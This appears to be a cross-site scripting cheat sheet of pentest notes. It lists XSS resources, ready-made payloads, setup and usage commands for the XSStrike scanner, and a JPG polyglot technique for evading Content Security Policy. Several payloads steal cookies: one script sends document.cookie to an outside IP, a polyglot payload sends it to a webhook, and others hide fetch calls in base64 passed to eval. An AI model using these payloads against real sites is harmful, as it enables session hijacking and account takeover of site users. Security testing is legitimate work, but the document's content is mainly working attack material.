XSS

Resources

Hacktricks XSS
Pipedream (webhooks)
CSP evasion with dangling markup
Portswigger XSS Cheatsheet

Payloads

PayloadAllTheThings
PayloadBox

<script>fetch("http://1.1.1.1/?cookie="+document.cookie);</script>

<img src=x onerror='eval(atob(\"ZmV0Y2goJ3BpcGVkcmVhbS90ZXN0MScp\"))' />

<img src="data:image/svg+xml,<svg onload=alert('XSS')></svg>">

data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMDAiIGhlaWdodD0iMTAwIj4NCiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+DQogIDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJqYXZhc2NyaXB0OmZldGNoKCdzb21ldGhpbmcnKSIgLz4NCjwvc3ZnPg0K

Discovery

XSStrike
XSSer

XSStrike

git clone https://github.com/s0md3v/XSStrike.git; cd XSStrike; pip install -r requirements.txt;
python xsstrike.py -u "http://<url>/?paramtotest=xyz&otherparam=42"

JPG CSP Evasion

CSP evasion with JPG polyglot
XSS JPG polyglot
img_polygloter.py

python img_polygloter.py jpg --height 120 --width 120 --payload 'fetch("https://webhook.xxx/c="+document.cookie);' --output payload.jpg

<script charset="ISO-8859-1" type="text/javascript" src="/the/image/w/payload.jpg"></script>

Resources​

Payloads​

Discovery​

XSStrike​

JPG CSP Evasion​

Resources

Payloads

Discovery

XSStrike

JPG CSP Evasion